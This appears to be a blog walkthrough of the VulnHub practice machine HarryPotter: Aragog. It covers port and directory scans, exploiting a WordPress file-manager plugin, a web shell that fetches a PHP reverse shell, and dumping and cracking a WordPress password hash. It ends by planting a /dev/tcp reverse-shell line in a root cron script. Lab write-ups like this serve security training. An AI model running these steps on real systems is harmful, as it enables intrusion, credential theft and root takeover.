VulnHub: HarryPotter: Aragog

Today we will take a look at Vulnhub: Aragog. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

  • Network scan

Command: sudo nmap -p- -sV -sC -oN nmap/open — open 192.168.0.112

PORT   STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 48:df:48:37:25:94:c4:74:6b:2c:62:73:bf:b4:9f:a9 (RSA)
| 256 1e:34:18:17:5e:17:95:8f:70:2f:80:a6:d5:b4:17:3e (ECDSA)
|_ 256 3e:79:5f:55:55:3b:12:75:96:b4:3e:e3:83:7a:54:94 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 3C:A0:67:C5:35:33 (Liteon Technology)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  • Gobuster

Command: gobuster dir -u http://192.168.0.112 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

/blog (Status: 301) [Size: 313] [ → http://192.168.0.112/blog/]
/javascript (Status: 301) [Size: 319] [ → http://192.168.0.112/javascript/]

  • Wordpress

Url- http://192.168.0.112/blog/

  • Wpscan

Command: wpscan — url http://192.168.0.112/blog/ — enumerate ap — plugins-detection aggressive — plugins-version-detection aggressive

  • Exploit

Command: git clone https://github.com/RandomRobbieBF/wp-file-manager.git

Command: pip3 install -r requirements.txt

Command: python3 wp-file-manager.py -u http://192.168.0.112/blog/

  • Reverse shell

Let’s use a php file to get the reverse shell. Let’s change and upload the ip address

Now type this on your machine

Command: python3 -m http.server 80

Enter this in the url

Url: http://192.168.0.112/blog//wp-content/plugins/wp-file-manager/lib/files/cmd.php?cmd=wget%20http://192.168.0.107/php-reverse-shell.php

Your machine

Command: nc -nvlp 1234

Url: http://192.168.0.112/blog//wp-content/plugins/wp-file-manager/lib/files/php-reverse-shell.php

After logging in

Command: script /dev/null -c bash

Command: export TERM=xterm

Ctrl+z

Command: stty raw -echo ; fg

Command: reset

  • Linpeas

Your machine

Command: python3 -m http.server 80

Target machine

Command: wget http://192.168.0.107/linpeas.sh

Command: chmod +x linpeas.sh

Command: ./linpeas.sh

  • Mysql

Command: mysql -u root -h localhost -p

Command: show databases;

Command: use wordpress;

Command: show tables;

Command: select * from wp_users;

  • hagrid98

John

Command: nano hash

Paste the hash here.

Command: john hash — wordlist=/usr/share/wordlists/rockyou.txt

Created directory: /home/al1z4deh/.john
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 128/128 AVX 4x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
password123 (?)
1g 0:00:00:00 DONE (2022-05-21 14:22) 2.083g/s 3200p/s 3200c/s 3200C/s teacher..mexico1
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed.

Command: su hagrid98

  • Root

pspy64

Command: wget http://192.168.0.107/pspy64

Command: chmod +x pspy64

Command: ./pspy64

Command: echo “bash -i >& /dev/tcp/192.168.0.107/4242 0>&1” >> /opt/.backup.sh

And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store